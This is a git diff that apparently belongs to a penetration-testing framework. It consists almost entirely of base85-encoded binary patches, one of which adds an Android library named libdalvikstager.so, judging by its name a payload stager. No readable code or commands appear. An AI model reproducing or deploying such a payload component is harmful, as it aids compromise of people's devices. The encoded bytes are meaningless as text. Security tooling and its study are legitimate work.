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 G)4u@fN9;5J literal 0 HcmV?d00001 
diff --git a/data/android/libs/x86/libdalvikstager.so b/data/android/libs/x86/libdalvikstager.so new file mode 100644 index 0000000000000000000000000000000000000000..e7a9f5e233ba153534221cf74548efe26a4583fd GIT binary patch literal 5220 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 
